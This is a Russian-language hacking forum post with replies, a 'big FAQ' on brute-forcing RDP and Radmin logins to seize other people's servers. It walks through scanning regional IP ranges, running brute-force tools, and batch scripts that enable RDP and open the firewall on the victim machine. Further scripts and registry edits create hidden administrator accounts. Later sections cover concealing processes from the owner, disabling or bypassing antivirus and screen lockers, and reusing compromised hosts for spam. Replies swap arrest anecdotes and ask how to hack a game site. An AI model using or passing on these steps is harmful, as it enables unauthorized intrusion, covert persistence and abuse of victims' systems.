Большой F.A.Q. по бруту дедиков В этой статье я постараюсь более мение полностью описать весь процес брута дедиков и работу на дедике. И так приступим: 1.Что такое дедик? Дедик - пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации. 2.Для чего предназначены дедики? Дедики можно использовать для абосолютно разных целей например для интернет серфинга, для брута, спама, можно ставить на нем игровые сервера (например я много раз находил на дедиках сервера кс) и т.д. 3.Где достать дедик? Дедик можно купить, сбрутить или добыть с помощю трояна. 4.Брут дедиков -Брут RDP RDP - протокол удалённого рабочего стола. Для брута RDP нам понадобитса следующие программы DuBrute RC2(сам брут)VT, vnc_scanner_GUI VT(сканер портов) и можно еще ipgeobase VT(база данных IP адресов). Программы не обязательно эти, можно и другие, но лично я пользуюсь етими. И так приступим. 1.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса в буфер. 2.Теперь запустите vnc_scanner_GUI и вставте в самое большое поле все ип адреса. И настроим его так: Теперь нажимаем Start Scan и ждем окончания работы. По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятса все ип адреса с открытым 3389 портом. 3.Запускаем DuBrute RC2 и нажимаем Generation. Теперь нажимаем File IP и выбираем наш IPs.txt Нажимаем File Login и выбираем файл с логинами(можно добавить свои) обычно Login.txt Нажимаем File Pass и выбираем файл с паролями (тоже можете добавить свои) обычно Pass.txt Нажимаем Make и можем закрывать это окно. Теперь в папке с брутом в файле source.txt записаны все комбинации ип адресов, логинов и паролей. Нажимаем Config и Настроим его так: Нажимаем OK и все настройка брута закончена, нажимаем старт и ждем окончания работы. После окончание работы все гуды сохранятса в файле good.txt Вот и все на етом брут RDP закончен. -Брут Radmin 1. Сам процес брута Radmin - программа для удалённого доступа. Для ее брута нам понадобитса lamescan3_r11 VT, ipgeobase VT и клент радмина radmin viewer VT 1.Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное Настроим его так: закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к радмину, и поставте все галочки. Вот так: 2.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ип адреса и нажимаем Готово. Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы. После окончания работы можете спокойно подлючатса к хосам к которым подобран пароль. Вот и все на етом брут Radminа закончен. 2.Что делать дальше? После того как вы сбрутили несколько радминов нам понадобитса сделать с них дедик т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу). Приступим, включить RDP можно так: -Щелкаем Правой кнопкой мышки на Мой компютер->Свойства -Переходим на вкладку "Удалённые сеансы" -Ставим везде галочки или с помощю батника: @Echo off netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Чтобы запустить батник на компютере у жертвы надо с помощю передачи файлов закинуть батник в недры виндовса и подключитса к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat Чтобы включить мультиюзерность надо пропатчить систему следующим патчем TS_Free VT и перезагрузить компютер, запустить его можно также с использованием командной строки. Вот и все теперь можете подключитса к компютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее. 5.Как создать и скрыть пользователя на дедике? Не буду розказывать о всех способах создание пользователя т.к. ето замет много времени, розкажу о основных. 1.С помощю Управление компютером -Щелкаем Правой кнопкой мышки на Мой компютер->Управление -Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставте только на 3 пункте) 2.С помощю cmd Включаем cmd и создаем пользователя командами: net user Имя Пароль/add net localgroup Група администраторов Имя /add net localgroup Група пользователей RDP Имя /add net accounts /maxpwage:unlimited 3.С помощю батника который создает и сразу скрывает пользователя с екрана приветствий Set AdmGroupSID=S-1-5-32-544 Set AdmGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J Set AdmGroup=%AdmGroup:~0,-1% net user Имя_пользователя Пароль /add net localgroup %AdmGroup% Имя_пользователя /add Set RDPGroupSID=S-1-5-32-555 Set RDPGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J Set RDPGroup=%RDPGroup:~0,-1% net localgroup "%RDPGroup%" Имя_пользователя /add net accounts /maxpwage:unlimited reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Имя_пользователя /t REG_DWORD /d "00000000" /f 4.С помошю программы DED C14 vt она создаст и скроет пользователя. 5.Скрыть пользователя. Вот мы создали пользователя теперь надо скрыть его с екрана приветствия при запуске виндовс и в папке Documents and Settings, на скрытьии в папке останавлеватса не буду надеюсь все это знают. Чтобы скрыть пользователя в екране приветствия в ветке реестра HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList нужно создать параметер типа DWORD с именем пользователя и значением 0. Вот и все тепер на дедике у нас есть свой скрытый пользователь. 6.Как пользоватса дедиком не создавая пользователя(под админом) и не быть замеченым? Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы hidetoolz VT, PS Tray Factory VT, DelTrayIcon VT. Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать: - Запускаем PS Tray Factory и в первых двух вкаладках отмечаем приложения которые хотим скрыть и сворачеваим эго(не выключаем). Посе етого действия пропадут окна нашых програм, но останетсу процесы иконка PS Tray Factory. - Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процесы PS Tray Factory и програм которые мы хотели скрыть. - Запускаем hidetoolz и на процесах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его. Если вы все сделали правильно то теперь наши программы работают на учетке админа полностю скрыто и он об етом даже не подозревает. Тепер чтобы увидеть окна вашых програм включите hidetoolz и зделайте все процесы видимыми, убейте в деспетчере задач процес PS Tray Factory, система немного залагает и покажет вам окна всех програм которые вы скрыли. 7.Что делать если антивирус на дедике удаляет ваши программы? Обяснять для каждого антивируса очень долго но розкажу в общем виде(если что поищите в гугле). Нужно создать папку гдето в недрах виндовс, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы. Если антивирь не разрешает изменений и просит пароль можем попытатса выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа. 8.Что делать если на дедике ScreenLocker? Как обойти новые локеры я чесно говоря не знаю, но можно попытатса вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процес локера, или вызвать командную строку с помощю [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процес локера, можно попытатса переключитса на другое окно с помощю [Alt]+[Tab] или если есть доступ до файлов с помощю техже команд что написал выше убить процес батником. 9.Как зайти на дедик? Для того чтобы зайти на дедик нажимаем Пуск->Выполнить... у вас откроетса окно "Запуск программы" в нем пишем mstsc и нажимаем OK, откроетса окно "Подключение к удаленному рабочему столу" в поле "Компьютер:" пишем ип адрес дедика, для более удобного доступа нажимаем кнопку "Параметры" и в поле "Пользователь" пишем имя учетки, ставим галочку на "Разрешить мне сохранять учетные данные" и нажимаем Подключить, появитса еще одно окно в нем пишем пароль и ставим галочку внизу, на нажимаем ОК и все вы на дедике, чтобы зайти на него еще раз вам просто будет нужно выбрать ип дедика и нажать Подключить и ваш компютер автоматически введет логин и пароль к пользователю. Когда вы ето все проделали в Параметры->Параметры подключение можно нажать сохранить как и сохранить файл с расширение .rdp потом надо будет только запустить файл и вы сразу окажетесь на дедике. 10.Как подключить свой локальный диск и буфер обмена к дедику? Для того чтобы подключить к дедику свой локальный диск и буфер обмена в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Лкальные ресурсы" внизу ставим галочку на "Буфер обмена" и нажимаем "Подробнее" в открывшемся меню выбираем какое устройство вы хотите подключить и ставим галочку возле него(если подключить диск на котором установлена ваша ОС (Обычто диск C ) то можно будет ппередавать файлы через буфер обмена), нажимаем ОК и все готово, теперь вы можете намного легче и быстрее передать необходимые файлы на дедик, только не увлекайтесь етим потомучто ваш локальный диск будет доступен всем пользователям дедика т.е. админ увиди что подключилса ваш диск, потому надо быстро передать файлы, выйти из дедика, отключить диск и пользоватса дедиком далше. 11.Автоматически запустить свою прогу при входе на дедик Вы можете запустить свою програму при подключении (обычно программы для сбора информации) для етого в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Программы", ставим галочку и в поле путь к программе и имя файла пишем "tsclient\\буква диска\путь к файлу" и нажимаем подключить. Базы данных ип адресов стран можно найти на сайте www.proxysecurity.com Вот и все на етом моя статья закончена если будут еще какието вопросы или идеи что добавить в статью говорите. Прошу сильно не ругать это моя первая статья.
Можешь патч на мультиюзерность перезалить? Там файл удалён, а искать другие - не все работают на win 7
причем тут только Радмин мне не понятно,если написал что по Дедикам? Не чего нового нет,такого везде масса,это для новичков может ,не более того
Это все есть в паблике. Нет я за это беру оплату.Просто так не чего не рассказываю. Сам обучался платно. Тогда такого не было,как сейчас
У знакомых было вот так:Чувак брутил со своего пк Германию вроде,через пару дней из одного универа Германии пришло письмо провайдеру о прожественных попытках входа (вообщем сказали что атакуют) после чего провайдер отрубил инет пользователю и пригрозил чуваку что если будет ещё такими делами заниматься то получит по попе и т.п. Было ещё такое: Чувак с деда брутил РУ и через 3 дня к нему приехали гости,анально наказали и выписали штраф.Но есть знакомы которые уже пару лет Ру брутят и хоть бы хны.
ну и я думаю) год назад Чекал 3млн мыл. где то 10 дней безпередышки с своего компа и пофег) но сам шугался чуток)
такой умный одни мы тут все тупые. спасибо что подсказал а то не кто не знал. тебе ещё таких 10 ток дать сайтов умник.
Почему на ламескане доходит подбор, при стандартных логинах и пасах, до 61% ничего дальше, как исправить? И как взломать фан сайт MMORPG Легенда Рыцаря?
